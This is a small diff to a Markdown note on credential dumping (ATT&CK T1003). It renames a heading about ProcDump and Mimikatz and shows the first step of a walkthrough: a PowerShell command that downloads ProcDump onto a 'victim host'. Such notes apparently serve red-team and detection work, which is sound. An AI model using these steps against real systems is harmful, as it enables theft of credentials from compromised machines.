--- a/Techniques/T1003/T1003.md
+++ b/Techniques/T1003/T1003.md
@@ -7,7 +7,7 @@
 
 # Details
 
-## Using `ProcDump` and `Mimikatz`
+## ProcDump and Mimikatz
 * Download `ProcDump` to victim host:
 ```
 powershell Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile %ALLUSERSPROFILE%\Procdump.zip
